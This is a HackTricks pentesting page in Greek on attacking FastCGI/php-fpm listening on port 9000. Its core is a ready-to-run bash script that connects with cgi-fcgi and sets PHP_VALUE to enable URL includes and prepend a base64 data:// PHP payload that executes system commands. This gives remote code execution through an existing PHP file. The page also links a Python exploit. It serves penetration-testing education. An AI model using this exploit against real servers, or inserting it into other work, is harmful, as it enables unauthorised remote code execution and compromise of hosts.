9000 - Pentesting FastCGI

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Βασικές Πληροφορίες

Αν θέλετε να μάθετε τι είναι το FastCGI ελέγξτε την παρακάτω σελίδα:

disable_functions bypass - php-fpm/FastCGI

Από προεπιλογή, το FastCGI εκτελείται στη θύρα 9000 και δεν αναγνωρίζεται από το nmap. Συνήθως το FastCGI ακούει μόνο στο localhost.

RCE

Είναι αρκετά εύκολο να κάνετε το FastCGI να εκτελεί αυθαίρετο κώδικα:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

ή μπορείτε επίσης να χρησιμοποιήσετε το παρακάτω σενάριο python: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Last updated